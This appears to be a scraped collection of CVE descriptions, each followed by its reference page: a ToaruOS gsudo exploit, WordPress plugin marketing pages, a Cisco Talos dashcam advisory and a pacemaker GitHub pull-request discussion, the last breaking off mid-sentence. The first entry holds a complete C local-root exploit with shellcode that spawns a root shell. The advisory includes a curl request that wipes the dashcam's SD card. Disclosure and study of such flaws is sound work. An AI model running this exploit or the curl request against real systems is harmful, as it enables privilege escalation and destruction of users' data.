apps/gsudo.c in gsudo in ToaruOS through 1.10.9 has a buffer overflow allowing local privilege escalation to the root user via the DISPLAY environment variable.

/\* \* The Mickey Mouse Hacking Squadron proudly presents \* \* CVE-2019-12937 \* \* ToaruOS 1.10.9 gsudo local root exploit \* \* .-"""-. \* / . - \\ \* \\ / \* .-""-.,:.-\_-.< \* / \_; , / ).| \* \\ ; / \` \`" '\\ \* '.-| ;-.\_\_\_\_, | ., \* \\ \`.\_~\_/ / /"/ \* ,. /\`-.\_\_.-'\\\`-.\_ ,",' ; \* \\"\\ / /| o \\.\_ \`-.\_; / ./-. \* ; ';, / / | \`\_\_ \\ \`-.,( / //.-' \* :\\ \\\\;\_.-" ; |.-"\` \`\`\\ /-. /.-' \* :\\ .\\),.-' / }{ | '..' \* \\ .-\\ | , / \* '..' ;' , / \* ( \_\_ \`;--;'\_\_\`) \* \`//'\` \`||\` \* \_// || \* .-"-.\_,(\_\_) .(\_\_).-""-. \* / \\ / \\ \* \\ / \\ / \* \`'--=="--\` \`--""==--'\` \* \* local@livecd ~$ gcc kowasu-gsudo.c -o kowasu-gsudo \* local@livecd ~$ whoami \* local \* local@livecd ~$ ./kowasu-gsudo \* 0@livecd /home/local# whoami \* root \*/ #include <stdio.h\> #include <stdlib.h\> #include <string.h\> #include <unistd.h\> #define EIP "\\xb0\\xb0\\x01\\x3f" #define EIP\_DISTANCE 26U char shellcode\[\] = { 0x31, 0xc0, 0x04, 0x18, 0x31, 0xdb, 0xcd, 0x7f, 0xeb, 0x1a, 0x5b, 0x31, 0xc0, 0x88, 0x43, 0x07, 0x89, 0x5b, 0x08, 0x89, 0x43, 0x0c, 0x04, 0x07, 0x8d, 0x4b, 0x08, 0x8d, 0x53, 0x0c, 0xcd, 0x7f, 0x31, 0xc0, 0xcd, 0x7f, 0xe8, 0xe1, 0xff, 0xff, 0xff, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x68, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x00 }; unsigned int shellcode\_length = 57; int main(void) { /\* Payload is large, because the arguments and environment start around \* 0x3f00XXXX and we need to pivot the address to remove the 0 byte. \* We do this by including a 64k nop sled in the payload. \*/ char payload\[65536\]; char vector\[8192\] = "DISPLAY=AAA"; char \* const arg\[3\] = { "/bin/gsudo", "meh", NULL }; char \* const env\[3\] = { payload, vector, NULL }; memset(payload, 'A', sizeof(payload) - shellcode\_length - 1); payload\[sizeof(payload) - shellcode\_length - 1\] = 0; strcat(payload, shellcode); for (unsigned int i = 0; i < EIP\_DISTANCE; i++) strcat(vector, EIP); execve("/bin/gsudo", arg, env); perror("execve()"); exit(EXIT\_FAILURE); }

CVE-2019-12937: kowasuos/kowasu-gsudo.c at master · mehsauce/kowasuos

The Hustle (aka wordpress-popup) plugin 6.0.7 for WordPress is vulnerable to CSV Injection as it allows for injecting malicious code into a pop-up window. Successful exploitation grants an attacker with a right to execute malicious code on the administrator's computer through Excel functions as the plugin does not sanitize the user's input and allows insertion of any text.

**Description**

_Hustle is the ultimate marketing plugin for building a mailing list and converting site traffic. Lead generation just got easier with simple set up optin forms, targeted marketing popups, and designer-made templates. Build a social following while you’re at it with Hustle’s diverse social sharing capabilities. From the award winning developers of Smush image optimization and Forminator form builder at WPMU DEV._

Hustle lets you easily grow your mailing list or display targeted ads across your site with popups, optins, slide-ins, widgets, and shortcodes.

**Instant Templates For Every Kind Of Offer**

Hustle makes the process of creating popups, slide-ins, and embeds easier with a range of pre-designed templates. The templates available represent a number of different use cases (e.g. Black Friday, giveaway, COVID notice, newsletter signup), meaning you can get started with a module that aligns with your campaign goals. See them in action below:

**Learn The Ropes With These Hands-On Hustle Tutorials**

*   How to Get the Most Email Subscribers Using Hustle
*   How to Make the Perfect Popup with Hustle
*   How To Get The Most Out Of Using Hustle

**Get Creative With Styling For Desktop and Mobile**

Hustle’s flexible appearance settings can help your marketing stand out. Choose colors, animations, layouts, drop shadows, and display conditions from the easy-to-use design settings for all your marketing modules. By default layouts and templates are fully mobile responsive. But you can also make granular adjustments (margins, padding, borders, container sizing) to ensure your modules are popping on all devices.

**Take Styling & Customization Even Further**

If you have an eye for detail you’ll love the additional customization options available with Hustle. As well as basic appearance elements like layout, images, typography, and color – Hustle allows for more advanced detailing like borders, spacing, shadow, module sizing, and more. There’s also custom CSS if you’d really like to make your modules your own.

**Highly Targeted Display Settings**

Hustle has all the behavior and condition settings you’ll need to target visitors with email opt-ins or ads. Set up intelligent conditions such as: specific pages and posts, visitor device/browser, country, source of arrival, post registration, browser cookie, and a whole lot more.

**Smart Triggers For Popups And Slide-ins**

As well as intelligent visibility conditions, Hustle also allows you to set up a range of behavior triggers for your popups and slide-ins. Including: time on page, scroll, exit-intent, and more.

**Set Specific Schedules For Best Results**

Hustle makes it easy to schedule exactly when you want your marketing modules to deploy. Set start and end dates, schedule modules to show on specific days of the week, at a certain time of day, and choose a custom timezone to adhere to.

**Reach Out To Visitors Via Email**

Once a user has engaged with one of your marketing modules it’s important to follow up with next steps or a simple welcome message. Hustle’s email settings allow you to easily whip up manual or automated email messages and establish that initial connection.

**Get Busy With Social Sharing**

Hustle includes top social icons for easily building your following on your favorite social networks. Quickly enable the most popular social networks and use floating social, widgets, and shortcodes to add followers.

*   Facebook
*   Twitter
*   Pinterest
*   Reddit
*   LinkedIn
*   VKontakte
*   500px
*   Houzz
*   Instagram
*   Twitch
*   YouTube
*   Telegram
*   WhatsApp

**Form Builder Integrations**

Hustle integrates with popular free form builders like Forminator, so you can embed your forms, polls, and quizzes into popups and slide-ins for interactive lead generation. Grow your following and capture more leads with Hustle.

**Grow Your Mailing List**

Hustle integrates with all the popular email services. Just connect your account and start collecting new subscribers.

*   AWeber
*   ActiveCampaign
*   Campaign Monitor
*   MailChimp & MailChimp groups
*   Constant Contact
*   ConvertKit
*   GetResponse
*   Mailster
*   Hubspot
*   Sendy
*   Mad Mimi
*   Mautic
*   Infusionsoft
*   SendinBlue
*   MailPoet
*   MailerLite
*   iContact
*   Zapier
*   SendGrid

**Gutenberg WordPress Editor Block**

Hustle supports both the Classic Editor plugin and Gutenberg. When you’re ready to say goodbye to shortcodes, the Hustle block pulls your opt-ins and embedded content in for you.

**Smart Exit-Intent**

Hustle has exit-intent, a favorite of professional marketers, that detects when visitors are about to leave your site and – BOOM! A pop-up or slide-in to grab their attention.

**ReCAPTCHA Spam Warrior**

Keep bot subscribers from taking over your mailing lists. Hustle connects to Googles ReCAPTCHA to protect your signup forms from spam.

**Adblock is no Match for Hustle**

Hustle has the moves and displays pop-ups and slide-ins even when Adblockers try to block your content.

**Measure Performance and Results**

Whether you’ve created a popup, slide in, or embed, Hustle allows you to track the results of each individual module with intelligent tracking data, conversion stats, and insightful charts for a visual representation. You can also set up a custom widget and include stats on your WP dashboard.

_Features available in Hustle include:_

*   Pop-ups, slide-ins, widgets, embeds and after post opt-ins
*   Ready-made marketing templates – Discount, sale, Black Friday, COVID-19
*   3 free popups upgrade to Hustle Pro for unlimited
*   3 free slide-ins upgrade to Hustle Pro for unlimited
*   3 free social share bars upgrade to Hustle Pro for unlimited
*   3 free embeds upgrade to Hustle Pro for unlimited
*   Built-in designs editor for simple customization
*   Color match your brand, like magic
*   Smooth display animations
*   Integrate with the best email services including: Aweber, MailChimp, MailChimp groups, Constant Contact, Sendy, Infusionsoft, GetResponse, Campaign Monitor, and many more
*   Super powerful conditions for targeting your audience
*   Schedule your modules to display at a specific time or date
*   Track how many times pop-ups, slide-ins and opt-ins are displayed
*   See submissions straight through WordPress
*   Conversion rates overview
*   4 default layouts
*   Easy management dashboard
*   New features, layouts and sass coming every month

**What Do People Say About Hustle?**

★★★★★

> “I don’t know how I’ve survived this long without Hustle and Forminator, but I’m now using them on every website I build.” – sherylryan

★★★★★

> “Recovering 15%+ of sales due to this. Insanely good. Thanks!” – lmbpack

★★★★★

> “We used this plugin to build a beautiful pop-up to attract more users and increase conversion rate. Thanks” – inblch98

★★★★★

> “Maybe the only plugin with free “exit intent” feature. Simple but powerful.” – tutoruniversitario

★★★★★

> “Wow, we needed so many pop ups for client’s websites with this COVID thing going on. We used the Hustle on all of them. No problems and they look great!” – tammylfinch

**A Note From Hustle**

Hey! This is Hustle, your trusted popup, email opt-in, and marketing plugin for WordPress. I’m part of the WPMU DEV team, a superhero-suite of WordPress plugins, services, and support. Here are some of our other free plugins:

*   Smush – Image Compression and Optimization
*   Forminator – Form, Quiz, Poll and Survey Builder
*   Hummingbird – Speed up, Cache, Optimize Your CSS and JS
*   Branda – White Label WordPress, Maintenance Mode and Coming Soon Pages

And if you need ALL our Pro plugins AND 24/7 WordPress support, get a WPMU DEV membership! You can try it free for 7 days: wpmudev.com

My superhero friends run the WPMU DEV Blog, your source for the very best WordPress tutorials. If you need to be in the know about WordPress, check it out.

Thanks for looking at Hustle, and I look forward to helping you market and grow your business with popups and more.

_Enjoy, The Hustle_

**About Us**

WPMU DEV is a premium supplier of quality WordPress plugins, services and support. Join us here:  
https://wpmudev.com/

Don’t forget to stay up to date on everything WordPress from the Internet’s number one resource:  
WPMU DEV Blog

Hey, one more thing… we hope you enjoy our free offerings as much as we’ve loved making them for you!

CVE-2019-11872: Hustle – Email Marketing, Lead Generation, Optins, Popups

The WP Booking System plugin 1.5.1 for WordPress has no CSRF protection, which allows attackers to reach certain SQL injection issues that require administrative access.

*   Details
*   Reviews
*   Installation
*   Development

The booking calendar plugin for WordPress. WP Booking System is used by more than 9,000 active users, with a satisfaction rate that borders on 5\*!

Is this booking calendar for you?

*   Do you rent something out, like a holiday home, a boat or something else?
*   Do you have a WordPress website and need a bit of help to keep track of your rentals through a booking calendar?

…then yes! The WP Booking System is perfect for your needs.

Get easy online booking with this lightweight and powerful booking system.

**A set-and-forget booking calendar for your rental business**

WP Booking System is a simple booking calendar for WordPress. You will be up and running in just a few minutes. You can create booking calendars and forms, and you can manage your bookings. You can easily customize the booking calendar to fit your needs.

Start receiving bookings from your visitors today!

**Display available dates in your booking calendar**

With just one click you can create the first booking calendar for your holiday home or rental business. Already have bookings made? You can manually manage the calendar’s availability in just a few seconds.

Now your booking calendar is up to date with the latest bookings and available dates!

**Create a form and enable clients to make bookings online**

The beauty of this WordPress booking calendar is that it allows your website visitors to book available calendar dates on the spot through a fully customizable booking calendar form.

Enable your clients to use the rental calendar fast and easy. In just three simple steps, clients will be able to reserve a slot on your booking calendar:

*   Hover over the booking calendar to pick a starting date. Click on it, then move the cursor to select the number of days to book. (clients can easily see booked days by using the booking system legend)
*   Next, fill in the booking system form (you can edit the form fields at any time to make sure clients submit the most relevant information you need; mark fields as compulsory or optional)
*   Finally, click the booking button to make a reservation.

With the premium version of the booking system, you can allow customers to make online bookings using the top payment platforms available at the moment!

> Click here to see a demo of the premium version

You can review and manage calendar bookings from the back-end, so you are always in control. You can even set up automatic calendar notifications so you will receive an email when a booking is made. Now you’re all set to receive online bookings through your booking calendar.

**Receive and manage bookings**

All your bookings are saved in your rental calendar and are beautifully displayed so you can easily access them and view the booking details.

**No time to read the description? Discover the top benefits of WP Booking System in just 40 seconds!**

**Features of the Free version:**

*   Create your own booking system: a booking calendar and a booking form!
*   Receive and manage bookings
*   Save extra booking information
*   Generate a shortcode to insert the booking calendar and booking form into a page or post
*   Use the Gutenberg block to embed the booking calendar
*   WP Booking System Widget
*   The booking calendar supports multiple languages

**EXTRA FEATURES OF THE PREMIUM BOOKING CALENDAR VERSION:**

*   The booking system can accept online and offline payments
*   iCalendar Sync, Import and Export
*   Create an unlimited number of booking calendars
*   Create an unlimited number of booking forms
*   Create your own rental calendar legend: apply your own colors and text
*   Split days selection
*   Display multiple months
*   Change the first day of the week
*   Change the start month / year
*   Display an overview reservation calendar
*   Edit multiple dates with just one click
*   Display tooltips with extra info
*   Hide calendar bookings from the past from your visitors
*   Set the minimum number of days that the visitor must book
*   Show the week’s number on the booking calendar
*   Automatically block booked days directly
*   Send booking notifications
*   User management within the booking system
*   Very easy to translate into any language
*   Professional support for any question related to the booking calendar
*   Download the Premium version at: www.wpbookingsystem.com

**This WP Booking Calendar Plugin is for…**

Any rental business should use the WP Booking Calendar plugin to keep track of their rental calendar throughout the year.

*   Property rentals: bed & breakfast, hotels, hotel rooms, cottages, apartments, houses, apartment rooms (use WP Booking System even when you are renting through AirBNB, Booking.com etc.)
*   Boat rentals
*   Car & motorcycle rentals
*   Sports equipment rentals (full day ski equipment rental, bike rentals, skates rentals etc)
*   Events rentals (full day trainings/courses, parties, weddings, baptisms, corporate events, business meetings, conferences etc)
*   Speakers, singers, photographers, videographers, inspectors can also benefit from using WP Booking system

The booking system will soon become an indispensable tool in your business, and you will find yourself using it daily to manage reservations in your calendar.

**How the booking calendar helps your clients**

*   Clients can make calendar bookings online, by accessing your website
*   No need to call to make a reservation
*   They can see the available calendar dates and manage their schedule to make a booking
*   They can make simple and fast bookings from the comfort of their own home, directly from their mobile phones

**Key booking system benefits for your business**

*   Collect relevant information about your clients through the booking system form (configure the rental calendar form to your needs). No need to call or collect this information at the desk.
*   Use the WP Booking System on the go, from your mobile phone. The WP Booking Calendar can be used from mobile devices with ease – simply log in to your website and make any necessary edits just like on a computer.
*   Manage bookings offline – when you meet with a client 1:1 and they want to make a future booking, simply log in to your website, access the booking calendar and make the reservation on the spot, for them.
*   Stay up to date with calendar bookings by receiving email confirmations and reminders

**WP Booking System in a nutshell…**

Get organised and start receiving bookings with WP booking system. With this WP plugin you can create booking calendars, booking forms and accept bookings via your website. Setting it up is really easy and you will be up and running in just a few minutes. Bookings will be clearly listed in your booking calendar and you can stay organised. The booking calendar plugin works simply and it can be translated into several languages.

This plugin provides 1 block.

*   WP Booking System - Booking Calendar

1.  Install the plugin by uploading the zip file (Plugins > Add New > Upload)
2.  Activate the plugin through the ‘Plugins’ menu in WordPress
3.  Click on the ‘WP Booking System’ menu entry
4.  Click on ‘Add New’ at the top of the page to create a calendar
5.  To embed a calendar on a page or post, use the ‘Add Calendar’ button at that page

**How can I embed the booking calendar on a page or post?**

By using the ‘Add Calendar’ button above the editor, the Gutenberg module, a widget, or directly by using the shortcode. An example of the shortcode is:

    [wpbs id="1" title="yes/no" legend="yes/no" language="auto" form_id="1"]
    

**Will this booking system work for me?**

We’re pretty sure about that! We made this plugin as ‘flexible’ as possible. The booking plugin works with bookings on a per day basis (no time slots). So if you rent something out on a daily basis, then the WP Booking System is a good choice.

**I have another question**

Please see www.wpbookingsystem.com for more information and ask your questions there!

Very good plugin, fits exactly to our needs. The most reactive an fastest support I have ever seen.

Great versatile plugin and the support is excellent.

When asking for an update to a Wordpress plugin you immediately think that you won't even get a reply but I was pleasantly surprised when Roland replied to my request saying that if they get time they will include my request.I thought that this would be the end of it but 2 weeks later when there was a plugin update, I noticed that my request had been considered and implemented.This makes my life so much easier when the people booking wish to change the boat they have booed and now that I can easily switch calendars without deleting and re entering all the details. Many thanks and special praise to the supporter named Roland!Lucien @ Ellerbeck Narrowboats

The support from Roland is fantastic, fast and in depth. I had a requirement for an additional function, Roland was back within an hour with it added to the Pro version. Can't recomment this plugi highly enough.

I installed this for our campsite bookings. I have tried a couple of other booking plugins but this is by far the best. Our requirement are straightforward: a single campsite that only takes one booking, but has variable nightly costs and optional additional campers. The plugin was perfect for this. Set up was a bit involved, but they all are like that. Configuration of things like notifications and payments was straightforward and clear. The Stripe integration is particularly good. I only have one criticism: when you configure manual acceptance of bookings, and then accept a booking, the relevant date statuses do not update automatically. This has to be done manually. However, I'm sure they will change that at some point. All in all a great plugin, well worth the fee and with really good support.

Plugin is working really well. Managing my bookings and syncing with bookin.com and AirBnB works like a charm. In the exceptional situation that I need some support, Roland is always available to help out. Perfect support.

Read all 248 reviews

“WP Booking System – Booking Calendar” is open source software. The following people have contributed to this plugin.

Contributors

*    Roland Murg

**2.0.18.1**

*   Improved: Security improvements

**2.0.18**

*   Fixed: Deprecated notice when activating the plugin

**2.0.17**

*   New: Added “Number” form field

**2.0.16**

*   Improved: Updated Elementor Widget

**2.0.15**

*   Improved: Security fix

**2.0.14**

*   New: Added Icelandinc Language
*   New: Added Chinese Language
*   New: Added Latvian Language
*   Improved: Compatibility with WP 5.6 and TwentyTwentyone theme

**2.0.13**

*   Fixed: Bug with reCAPTCHA key not being included.

**2.0.12**

*   New: Added Indonesian language
*   Fixed: An issue with calendar not being sized properly on page load.
*   Fixed: An issue that could cause reCAPTCHA not to validate on some server configurations.

**2.0.11**

*   Improved: Minified CSS and JS Files.
*   Improved: Removed Duplicate HTML IDs in form editor
*   Fixed: A jQuery error that appeared in some cases when editing the form

**2.0.10**

*   Fixed: Backend calendar is now displayed in the correct language set in WordPress.

**2.0.9**

*   Improved: Compatibility changes for the new WordPress 5.4
*   Improved: Calendar dynamic sizing when resizing the viewport

**2.0.8**

*   Fixed: Single date selection on mobile devices

**2.0.7**

*   New: Added Korean language
*   Improved: Changed translation file locations
*   Improved: Minified JS file
*   Fixed: CSS display issue for Email Tags
*   Fixed: Language codes for Slovenian and Swedish
*   Fixed: Changed Czech flag

**2.0.6**

*   Improved: Admin Layout changes to match WP 5.3

**2.0.5**

*   Fixed: Widget not allowing a calendar without a form
*   Fixed: Email not allowing HTML tags

**2.0.4**

*   Fixed: Translation of dates sent in emails
*   Fixed: iCalendar sync delay bug
*   Improved: Calendar date selection styling

**2.0.3**

*   Added: Chinese Language

**2.0.2**

*   Fixed: iPhone and iPad bug when selecting calendar dates

**2.0.1**

*   Fixed: Bug that caused some emails not to be sent.

**2.0.0**

*   Major Rebuild
*   New: Gutenberg Module
*   Improved: Calendar Editor
*   Improved: Form Builder
*   Improved: Booking Manager
*   Improved: Calendar front-end display

**1.5.2**

*   Fixed Deprecated widget constructor

**1.5.2**

*   Security Improvements

**1.5.1**

*   Fixed: Issue with hovering over calendar dates.

**1.5**

*   Added Bulgarian language
*   Fixed Mod\_Security new SQL Injection filter conflict

**1.4**

*   Added filters to sanitize user input to prevent cross-site scripting (XSS) and SQL injections. Thanks to JPCERT/CC for pointing us at this issue.

**1.3.3**

*   Fixed a small CSS issue regarding bulk edit

**1.3.2**

*   Fixed translation problem regarding form options (i.e. radio buttons)

**1.3.1**

*   The notification of unread bookings now disappears when you delete the related calendar

**1.3**

*   The admin panel is now fully responsive
*   Updated the Premium features list

**1.2.3**

*   Small tweak to support PHP 7

**1.2.2**

*   Hide notifications in the toolbar when the user does not have access to the corresponding page

**1.2.1**

*   Decode booking details before saving

**1.2**

*   Minor bug fixes

**1.1**

*   UTF-8 fix

**1.0**

*   Changed the version number to 1.0

**0.7**

*   Small CSS fixes and a language fix related to the widget

**0.6**

*   Second output buffer fix

**0.5**

*   Output buffer fix

**0.4**

*   Fix in booking details fields.
*   Update (elaboration): The booking notes (the content of the text fields near the editable dates in the admin panel) were shown in the source code of the page the calendar was displayed on (this content can also be indexed by Google). If you were vulnerable, your website and the booking notes may have been archived and exposed by https://archive.org, and possibly by other sites. Please ask them to delete your data if needed. Affected versions of the Free version: All versions lower than 0.4.

**0.3**

*   Minor fix

**0.2**

*   Small CSS fixes

**0.1**

*   First release

CVE-2019-12239: WP Booking System – Booking Calendar

An exploitable firmware update vulnerability exists in the NT9665X Chipset firmware running on the Anker Roav A1 Dashcam, version RoavA1SWV1.9. The HTTP server could allow an attacker to overwrite the root directory of the server, resulting in a denial of service. An attacker can send an HTTP POST request to trigger this vulnerability.

**Summary**

An exploitable firmware update vulnerability exists in the NT9665X Chipset firmware running on the Anker Roav A1 Dashcam, version “RoavA1\_SW\_V1.9.” The HTTP server could allow an attacker to overwrite the root directory of the server, resulting in a denial of service. An attacker can send an HTTP POST request to trigger this vulnerability.

**Tested Versions**

Anker Roav A1 Dashcam RoavA1\_SW\_V1.9

**Product URLs**

https://goroav.com/products/roav-dash-cam-a1

**CVSSv3 Score**

5.3 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

**CWE**

CWE-276: Incorrect Default Permissions

**Details**

The Novatek NT9665X SOC is a chipset used in an large number of consumer camera devices, particularly in dashboard cameras. The chip provides default firmware that is a fork of the Embedded Configurable Operating System (eCOS) project, which is found within the Roav A1 Dashcam,the product we are focusing on in this advisory.

The Roav A1 Dashcam by Anker is a dashboard camera that allows users to connect using the Roav app for Android and iOS so that they can control the camera remotely. In order to do this, users must first enable the “Wi-Fi AP” setting manually on the dashcam, and then connect to the “Roav\_A1\_” SSID, with the default password of “goroavcam”.

From here, the app interacts mainly with the dashboard camera via an eCOS web server running on port 80 that requires no authentication. The standard HTTP POST, GET and DELETE requests can be used to upload, download or delete videos and pictures from the dashcam. While there is a mechanism in place for locking videos, such that crash footage is not able to be removed, it is still possible on the eCOS platform to overwrite directories with a file, resulting in video loss.

Even more severely, it is possible to send an HTTP request as such: curl -x POST http://192.168.1.254//.

This results in the root directory of the web server being overwritten with a standard file that is not a directory. Additionally, the entire filesystem on the SD card disappears and all movie recording and picture taking is disabled until the device reboots. Upon reboot, the device automatically reformats the inserted SD card, as it cannot find the directories that it expects, deleting all previous recordings and snapshots.

While the loss of data is already severe, when this denial-of-service vulnerability is paired up with TALOS-2018-0699, the result is a total and complete disabling of the device — the device cannot be used at all until the battery runs out.

**Timeline**

2018-10-29 - Talos contacts vendor  
2018-11-02 - Report disclosed to vendor  
2018-12-04 - 30 day follow up  
2019-01-18 - 60 day follow up - Talos reaches out to TWNCERT for assistance reaching vendor (Novatek)>br> 2019-01-22 - TWNCERT contacted Novatek and advised Novatek will check emails for reports  
2019-03-06 - 90+ day follow up - Talos asks TWNCERT for direct point of contact for Novatek  
2019-03-27 - Talos sends follow up to TWNCERT  
2019-04-02 - Talos sends copies of email correspondence and reports to TWNCERT  
2019-04-18 - Suggested pubic disclosure date of 2019-05-13 (171 days after initial disclosure)  
2019-04-19 - Vendor fixed issue and provided patch to their IDH  
2019-05-13 - Public disclosure

Discovered by Lilith (<\_<) of Cisco Talos.

CVE-2018-4028: TALOS-2018-0700 || Cisco Talos Intelligence Group

A flaw was found in pacemaker up to and including version 2.0.1. An insufficient verification inflicted preference of uncontrolled processes can lead to DoS

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Conversation 8 Commits 8 Checks 0 Files changed

**Conversation**

Copy link

Contributor

** **jnpkrn** commented Apr 17, 2019**

This could possibly lead to unsolicited information disclosure by the
means of standard output of the immediately preceding agent/resource
execution leaking into the log stream under some circumstances.
It was hence assigned CVE-2019-3885.

The provoked pathological state of pacemaker-execd daemon progresses
towards crashing it for hitting segmentation fault.

\[0/4: make crm\_pid\_active more precise as to when detections fail\]

It would be bad if the function claimed the process is not active
when the only obstacle in the detection process was that none of the
detection methods worked for a plain lack of permissions to apply
them.  Also, do some other minor cleanup of the function and add its
documentation.  As an additional measure, log spamming is kept at
minimum for repeated queries about the same PID.

\[1/4: new helpers to allow IPC client side to authenticate the server\]

The title problem here could possibly lead to local privilege escalation
up to the root's level (and implicitly unguarded by some additional
protection layers like SELinux unless the defaults constrained further).

Main problem is that the authenticity assumptions were built on two,
seemingly mutually supporting legs leading to two CVEs assigned:

\* procfs (mere process existence and right path to binary check)
  used to verify (this part was assigned CVE-2018-16878), and

\* one-way only client-server authentication, putting the client
  here at the mercy of the server not necessarily cross-verified
  per the above point if at all (this part was assigned
  CVE-2018-16877)

whereas these two were in fact orthogonal, tearing security
assumptions about the "passive influencers" in the pacemaker's daemon
resilience-friendly constellation (orchestrated by the main of them,
pacemakerd) apart.  Moreover, procfs-based approach is discouraged
for other reasons.

The layout of the basic fix is as follows:
\* 1/4: new helpers to allow IPC client side to authenticate the server
       (this commit, along with unifying subsequent solution for
       both CVEs)
\* 2/4: pacemakerd to trust pre-existing processes via new checks instead
       (along with unifying solution for both CVEs)
\* 3/4: other daemons to authenticate IPC servers of fellow processes
       (along with addressing CVE-2018-16877 alone, for parts of
       pacemaker not covered earlier)
\* 4/4: CPG users to be careful about now-more-probable rival processes
       (this is merely to mitigate corner case fallout from the new
       approaches taken to face CVE-2018-16878 in particular;
       courtesy of Yan Gao of SUSE for the reporting this)

With "basic", it is meant that it constitutes a self-contained best
effort solution with some compromises that can only be overcome with the
assistance of IPC library, libqb, as is also elaborated in messages of
remaining "fix" commits.  Beside that, also conventional encapsulation
of server-by-client authentication would be useful, but lack thereof
is not an obstacle (more so should there by any security related
neglectations on the IPC client side and its connection initiating
arrangement within libqb that has a potential to strike as early as
when the authenticity of the server side is yet to be examined).

One extra kludge that's introduced for FreeBSD lacking Unix socket to
remote peer PID mapping is masquerading such an unspecified PID with
value of 1, since that shall always be around as "init" task and,
deferring to proof by contradiction, cannot be pacemakerd-spawned
child either even if PID 1 was pacemakerd (and running such a child
alone is rather nonsensical).  The code making decisions based on that
value must acknowledge this craze and refrain from killing/signalling
the underlying process on this platform (but shall in general follow
the same elsewhere, keep in mind systemd socket-based activation for
instance, which would end up in such a situation easily!).

\[2/4: pacemakerd to trust pre-existing processes via new checks instead\]

In pacemakerd in the context of entrusting pre-existing processes,
we now resort to procfs-based solution only in boundary, fouled cases,
and primarily examine the credentials of the processes already
occupying known IPC end-points before adopting them.

The commit applies the new helpers from 1/1 so as to close the both
related sensitive problems, CVE-2018-16877 and CVE-2018-16878, in
a unified manner, this time limited to the main daemon of pacemaker
(pacemakerd).

To be noted that it is clearly not 100% for this purpose for still
allowing for TOCTTOU, but that's what commit (3/3) is meant to solve
for the most part, plus there may be optimizations solving this concern
as a side effect, but that requires an active assistance on the libqb
side (ClusterLabs/libqb#325) since any
improvement on pacemaker side in isolation would be very
cumbersome if generally possible at all, but either way
means a new, soft compatibility encumberment.

As a follow-up to what was put in preceding 1/3 commit, PID of 1 tracked
as child's identification on FreeBSD (or when socket-based activation is
used with systemd) is treated specially, incl. special precaution with
child's PID discovered as 1 elsewhere.

v2: courtesy of Yan Gao of SUSE for early discovery and report for
    what's primarily solved with 4/4 commit, in extension, child
    daemons in the initialization phase coinciding with IPC-feasibility
    based process scan in pacemakerd in a way that those are missed
    (although they are to come up fully just moments later only
    to interfere with naturally spawned ones) are now considered so
    that if any native children later fail for said clash, the
    pre-existing counterpart may get adopted instead of ending up
    with repeated spawn-bury loop ad nauseam without real progress
    (note that PCMK\_fail\_fast=true could possibly help, but that's
    rather a big hammer not suitable for all the use cases, not
    the ones we try to deal with gracefully here)

\[3/4: other daemons to authenticate IPC servers of fellow processes\]

Now that CVE-2018-16877 issue alone is still only partially covered
based on the preceding commits in the set, put the server-by-client
authentication (enabled and 1/3 and partially sported in 2/3) into
practice widely amongst the communicating pacemaker child daemons and
towards CPG API provided by 3rd party but principally using the same
underlying IPC mechanism facilitated by libqb, and consequently close
the remaining "big gap".

As a small justification to introducing yet another "return
value" int variable, type-correctness is restored for those
that shall be cs\_error\_t to begin with.

\[4/4: CPG users to be careful about now-more-probable rival processes\]

In essence, this comes down to pacemaker confusing at-node CPG members
with effectively the only plausible to co-exist at particular node,
which doesn't hold and asks for a wider reconciliation of this
reality-check.

However, in practical terms, since there are two factors lowering the
priority of doing so:

1/ possibly the only non-self-inflicted scenario is either that
   some of the cluster stack processes fail -- this the problem
   that shall rather be deferred to arranged node disarming/fencing
   to stay on the safe side with 100% certainty, at the cost of
   possibly long-lasting failover process at other nodes
   (for other possibility, someone running some of these by accident
   so they effectively become rival processes, it's like getting
   hands cut when playing with a lawnmower in an unintended way)

2/ for state tracking of the peer nodes, it may possibly cause troubles
   in case the process observed as left wasn't the last for the
   particular node, even if presumably just temporary, since the
   situation may eventually resolve with imposed serialization of
   the rival processes via API end-point singleton restriction (this
   is also the most likely cause of why such non-final leave gets
   observed in the first place), except in one case -- the legitimate
   API end-point carrier won't possibly acknowledged as returned
   by its peers, at least not immediately, unless it tries to join
   anew, which verges on undefined behaviour (at least per corosync
   documentation)

we make do just with a light code change so as to

\* limit 1/ some more with in-daemon self-check for pre-existing
  end-point existence (this is to complement the checks already made in
  the parent daemon prior to spawning new instances, only some moments
  later; note that we don't have any lock file etc. mechanisms to
  prevent parallel runs of the same daemons, and people could run these
  on their own deliberation), and to

\* guard against the interferences from the rivals at the same node
  per 2/ with ignoring their non-final leave messages altogether.

Note that CPG at this point is already expected to be authenticity-safe.

Regarding now-more-probable part, we actually traded the inherently racy
procfs scanning for something (exactly that singleton mentioned above)
rather firm (and unfakeable), but we admittedly got lost track of
processes that are after CPG membership (that is, another form of
a shared state) prior to (or in non-deterministic order allowing for
the same) carring about publishing the end-point.

Big thanks is owed to Yan Gao of SUSE, for early discovery and reporting
this discrepancy arising from the earlier commits in the set.

This is now more likely triggerable once the problems related to
CVE-2018-16878 are avoided.

Copy link

Contributor Author

****jnpkrn** commented Apr 17, 2019**

Oops, Travis is failing in part because now we require resolution of  
hacluster/haclient, but arguably, the environment not having those  
is rather hostile for the cluster stack (basically an error in the  
deployment), so I suggest to deal with this afterwards.

For illustration:

    (lrmd_ipc_connect) 	info: Connecting to executor
    (crm_user_lookup) 	info: User hacluster lookup: Invalid argument
    (crm_client_new) 	warning: Could not find user and group IDs for user hacluster
    

Copy link

Contributor Author

****jnpkrn** commented Apr 17, 2019**

Last patch is a tentative attempt to calm Travis down.

Copy link

Contributor Author

****jnpkrn** commented Apr 17, 2019**

No longer tentative, it apparently helped.

Copy link

Contributor Author

****jnpkrn** commented Apr 18, 2019**

Just to rectify Med: controld: fix possible NULL pointer dereference  
commit a bit after-the-fact (there was no time for detailed analysis  
yesterday given the disclosure rush), it was related to the situation  
that for some reason neither of these daemons runs:

*   corosync
*   pacemakerd
*   pacemaker-based  
    (or this one runs but is not authentic \[or name service for user name  
    to UID translation et al. has just fallen apart\], which amounts to the  
